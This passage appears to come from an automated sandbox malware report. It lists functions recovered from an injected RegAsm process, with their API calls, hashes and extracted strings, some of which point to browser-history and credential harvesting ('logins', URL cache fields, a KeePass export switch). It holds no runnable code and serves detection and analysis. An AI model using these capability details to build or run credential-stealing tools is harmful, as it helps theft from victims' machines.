                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleIconLoadModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3495291681-0
                                                                                                                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                • API String ID: 3849927982-2252543386
                                                                                                                                                                                • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                                                                                • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                                                • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                                                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                • String ID: logins$null
                                                                                                                                                                                • API String ID: 2148543256-2163367763
                                                                                                                                                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID: ---
                                                                                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                                                                                • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                • free.MSVCRT ref: 004186C7
                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                • free.MSVCRT ref: 004186E0
                                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                • free.MSVCRT ref: 00418716
                                                                                                                                                                                • free.MSVCRT ref: 0041872A
                                                                                                                                                                                • free.MSVCRT ref: 00418749
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                • String ID: |A
                                                                                                                                                                                • API String ID: 3356672799-1717621600
                                                                                                                                                                                • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                • String ID: A
                                                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
